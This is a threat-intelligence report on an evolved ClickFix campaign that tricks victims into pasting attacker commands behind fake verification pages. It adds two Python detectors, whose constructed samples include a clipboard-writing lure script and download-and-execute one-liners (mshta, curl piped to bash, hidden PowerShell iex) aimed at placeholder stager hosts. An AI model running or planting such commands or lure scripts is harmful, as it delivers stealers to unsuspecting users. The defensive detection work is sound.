Full Report
ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic detection of the operating system to provide the correct commands. [...]
Analysis Summary
# Tool/Technique: ClickFix Attacks (Evolved Campaign)
## Overview
ClickFix attacks are social-engineering driven campaigns where threat actors trick victims into pasting and executing malicious code or commands on their systems, often disguised as verification or software troubleshooting steps. Recent evolution introduces multimedia content (videos) and automated functions to increase pressure and reduce human error during execution. The typical goal is to deploy an information stealer payload.
## Technical Details
- Type: Technique (social engineering that leads the victim to run a multi-stage payload-delivery chain by hand)
- Platform: Multiple Operating Systems (Windows, macOS, Linux)
- Capabilities: OS detection, automated command copying, video-guided infection process, time-based pressure.
- First Seen: Not explicitly stated for the original technique; the evolved variant described here is from November 2025 research.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1189 - Drive-by Compromise (lure page served from compromised legitimate sites, SEO-poisoned sites and malvertising)
- T1566 - Phishing (where the lure URL is delivered by message rather than reached via search)
- **TA0042 - Resource Development**
- T1608.006 - Stage Capabilities: SEO Poisoning
- T1583.008 - Acquire Infrastructure: Malvertising
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.004 - User Execution: Malicious Copy and Paste (the victim pastes and runs the attacker's command)
- T1059 - Command and Scripting Interpreter
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1059.004 - Command and Scripting Interpreter: Unix Shell (macOS and Linux variants)
- **TA0005 - Defense Evasion**
- T1218 - System Binary Proxy Execution
- T1218.005 - System Binary Proxy Execution: Mshta
## Functionality
### Core Capabilities
- **Social Engineering:** Tricking users with fake CAPTCHA or human-verification challenges (e.g., a page styled as a Cloudflare verification check) that present the malicious command as the next step of the check.
- **Payload Delivery via Web:** Utilizing malicious JavaScript embedded on compromised websites or SEO-poisoned sites to execute the attack chain.
- **Multi-OS Support:** Automatically detecting the victim's Operating System (Windows, macOS, Linux) to deliver tailored, correct commands for execution.
### Advanced Features
- **Video Tutorials:** Embedding videos to guide victims step-by-step through the self-infection process, making the malicious sequence appear legitimate.
- **Clipboard Automation:** Using JavaScript to write the command to the user's clipboard without displaying it, so the victim only has to paste and press Enter; this hides the command's content and removes transcription errors that would otherwise break the chain.
- **Pressure Tactics:** Implementing a one-minute countdown timer to rush the victim into executing commands without proper verification.
- **Deception Counter:** Displaying a fake "users verified in the last hour" counter to simulate legitimacy.
- **Living-off-the-Land (LotL) Payloads:** Running the pasted command through native binaries such as `mshta.exe` and PowerShell on Windows, which then fetch and execute the next stage.
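The features listed above are what a content signature has to look for on the lure page itself. The following is an added example for this report, not code from the research it summarises: a Python scorer that checks raw page source for a script-driven clipboard write, OS branching, a countdown, run-box/terminal coaching text, LOLBin names and fake-verification framing. The two sample pages are constructed (placeholder `.invalid` URLs, no real stager), and the regexes, weights and threshold are assumptions for a first-pass triage signature that an analyst would tune on real traffic.

```python
"""Score page source for the ClickFix lure traits described above.

Added example for this report, not code from the research it summarises.
The two page samples are CONSTRUCTED (placeholder URLs, no real stager),
and the feature regexes, weights and threshold are assumptions for a
first-pass triage signature that an analyst would tune on real traffic.
"""
import re

# (feature name, regex over raw page source, weight). Weights are assumptions.
LURE_FEATURES = [
    # Script-driven clipboard write: the primitive that plants the command.
    ("clipboard_write",
     re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*.copy.\s*\)"), 3),
    # Branching on the visitor's OS to hand out a matching command.
    ("os_detection",
     re.compile(r"navigator\.(?:userAgent|userAgentData|platform)"), 2),
    # Countdown timer used to rush the victim.
    ("countdown",
     re.compile(r"setInterval\s*\(|seconds?\s*(?:left|remaining)", re.I), 1),
    # Coaching text that points at the Run dialog or a terminal.
    ("run_instructions",
     re.compile(r"Win(?:dows\s*key)?\s*\+\s*R|\bterminal\b|run\s+dialog", re.I), 2),
    # Native execution hosts named in page source.
    ("lolbin_strings",
     re.compile(r"\b(?:mshta|powershell|cmd\.exe|osascript|curl\s[^|\n]*\|\s*(?:ba)?sh)\b", re.I), 3),
    # Fake verification framing and social proof.
    ("fake_verification",
     re.compile(r"not a robot|verify you are human|verified in the last hour", re.I), 1),
]
# Assumption: a clipboard write alone, or a docs page with a copy button, must not trip it.
THRESHOLD = 7


def score_page(source: str) -> dict:
    """Return the matched feature names, their weighted sum and a verdict."""
    hits = [name for name, pattern, _ in LURE_FEATURES if pattern.search(source)]
    score = sum(weight for name, _, weight in LURE_FEATURES if name in hits)
    return {"score": score, "hits": hits, "is_lure": score >= THRESHOLD}


# Constructed lure page: mirrors the features above with placeholder commands.
SAMPLE_LURE = """
<div class="verify">
  <h2>Verify you are human</h2>
  <p>3,482 users verified in the last hour</p>
  <p>Step 1: press Win + R. Step 2: press Ctrl + V. Step 3: press Enter.</p>
  <p>Time left: <span id="s">60</span> seconds</p>
</div>
<script>
  var cmd = "echo placeholder";
  if (navigator.userAgent.indexOf("Windows") !== -1) { cmd = "mshta https://EXAMPLE-STAGER.invalid/v"; }
  else if (navigator.platform.indexOf("Mac") !== -1) { cmd = "curl -fsSL https://EXAMPLE-STAGER.invalid/m | bash"; }
  navigator.clipboard.writeText(cmd);
  setInterval(function () { var e = document.getElementById("s"); e.textContent = e.textContent - 1; }, 1000);
</script>
"""

# Constructed benign page: a docs page with a legitimate copy-to-clipboard button.
SAMPLE_DOCS = """
<h2>Install the CLI</h2>
<p>Open a terminal and run the command below.</p>
<pre id="cmd">pip install example-tool</pre>
<button onclick="navigator.clipboard.writeText(document.getElementById('cmd').textContent)">Copy</button>
"""

if __name__ == "__main__":
    for label, page in (("lure", SAMPLE_LURE), ("docs", SAMPLE_DOCS)):
        print(label, score_page(page))
```

The benign docs page scores on the clipboard write and the word "terminal" but stays under the threshold, which is the point of weighting: a single copy button is normal on the web, and only the combination of a hidden clipboard write with OS branching, a timer and LOLBin names is characteristic of the lure.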
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: Not provided in the context; the first stage runs through built-in system binaries (`mshta.exe`, `powershell.exe`) and PowerShell scripts rather than a named dropped file.
- Registry Keys: Not provided in the context.
- Network Indicators: Initial infection vector utilizes malvertising on Google Search, leading to compromised websites or SEO-poisoned sites hosting the malicious JavaScript. Specific C2 domains are not detailed.
- Behavioral Indicators: User interaction involving copying and pasting commands into a terminal/command prompt, often preceded by viewing a video tutorial under time pressure. Execution of native binaries like PowerShell or MSHTA in response to web interaction.
## Associated Threat Actors
- Unspecified threat actors; the campaign is described as an evolving method utilized by attackers.
## Detection Methods
- **Signature-based detection:** Web-content or proxy signatures on the lure page's JavaScript: a script-driven clipboard write combined with user-agent or platform branching, a countdown timer, and text instructing the user to open a run box or terminal.
- **Behavioral detection:** Monitoring process lineage for command interpreters (powershell.exe, cmd.exe) or LotL binaries (mshta.exe) spawned shortly after a web browsing session, especially when the parent is the process the user pasted into, and the command line downloads and executes remote content (e.g., `mshta` launched with a URL argument, or PowerShell started with a hidden window and a download-and-invoke one-liner).
- **YARA rules if available:** Not provided in the context.
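The behavioral check above can be expressed as a rule over process-creation telemetry. The following Python is an added example for this report, not code from the research it summarises: it reads JSON-lines events in a Sysmon Event ID 1 / EDR-like shape (`ParentImage`, `Image`, `CommandLine`, `User`), keeps only chains where a paste target (browser, the Windows Run dialog hosted by explorer.exe, or a terminal host) spawned an interpreter or LOLBin, and then requires a download-and-execute trait in the command line. The events are constructed, and the parent/child sets, field names and command-line patterns are assumptions a SOC would tune to its own data.

```python
"""Flag ClickFix-style execution chains in process-creation telemetry.

Added example for this report, not code from the research it summarises.
Events are CONSTRUCTED JSON lines in a Sysmon Event ID 1 / EDR-like shape
(ParentImage, Image, CommandLine, User). The parent/child sets and the
command-line patterns are assumptions a SOC would tune to its own data.
"""
import json
import re

# Processes a user pastes into after the lure: browsers, the Windows Run
# dialog (hosted by explorer.exe) and terminal hosts on each OS.
PASTE_PARENTS = {
    "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe",
    "windowsterminal.exe", "terminal", "iterm2", "gnome-terminal", "konsole",
}
# Native interpreters and LOLBins the pasted one-liner runs through.
EXEC_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "bash", "sh", "zsh", "osascript", "curl",
}
# Command-line traits of a stager; the names are carried into the finding.
CMDLINE_SIGNALS = [
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|wget)\b", re.I)),
    ("inline_exec", re.compile(
        r"\b(?:iex|Invoke-Expression)\b|\|\s*(?:ba|z)?sh\b|\bosascript\b", re.I)),
    ("hidden_or_encoded", re.compile(
        r"-(?:w|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I)),
]


def basename(path: str) -> str:
    """Lower-case final path component for Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict):
    """Return a finding for a suspicious parent -> child -> cmdline chain, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent not in PASTE_PARENTS or child not in EXEC_CHILDREN:
        return None
    signals = [name for name, pattern in CMDLINE_SIGNALS if pattern.search(cmdline)]
    if not signals:
        return None  # an interactive shell or a plain admin script is not enough
    return {"user": event.get("User"), "parent": parent, "child": child,
            "signals": signals, "cmdline": cmdline}


def hunt(lines):
    """Run evaluate() over JSON lines and collect findings in input order."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            hit = evaluate(json.loads(line))
            if hit:
                findings.append(hit)
    return findings


# Constructed events: three ClickFix chains (Windows Run dialog -> PowerShell,
# Run dialog -> mshta stager, macOS Terminal -> curl | bash) and two benign
# events that must not fire (an admin script, and a service-spawned task
# whose parent is not a paste target).
SAMPLE_EVENTS = r"""
{"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -nop -c \"iex (irm http://stager.invalid/v)\""}
{"User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://stager.invalid/verify.hta"}
{"User": "carol", "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "Image": "/bin/bash", "CommandLine": "bash -c \"curl -fsSL http://stager.invalid/m | bash\""}
{"User": "CORP\\dave", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"}
{"User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -c \"iex (irm http://internal.invalid/inventory.ps1)\""}
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS.splitlines()):
        print(finding["user"], finding["parent"], "->", finding["child"], finding["signals"])
```

The parent filter is what keeps this rule quiet: a scheduled task or management agent running the same download cradle is scoped out, while a user-driven paste from a browser, Run dialog or terminal with the same command line is exactly the chain the lure produces. Tune the parent and child sets to the browsers and shells actually deployed in the fleet.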
## Mitigation Strategies
- **Prevention:** Never execute commands pasted from untrusted web pages, especially when prompted by verification windows or CAPTCHAs.
- **Hardening:** Deploy Endpoint Detection and Response (EDR) capable of flagging anomalous execution chains that start from a browser or from a pasted command. Constrain PowerShell for standard users where possible (e.g., Constrained Language Mode, AppLocker or WDAC policies) and block or restrict `mshta.exe` where it is not needed.
- **User Education:** Train users to recognize urgency tactics (like timers) and suspicious requests to execute terminal commands as part of any online process.
## Related Tools/Techniques
- PowerShell execution used as the first stage once the user has pasted and run the command.
- Information Stealers (as the typical final payload).
- Past ClickFix variants that relied exclusively on text instructions.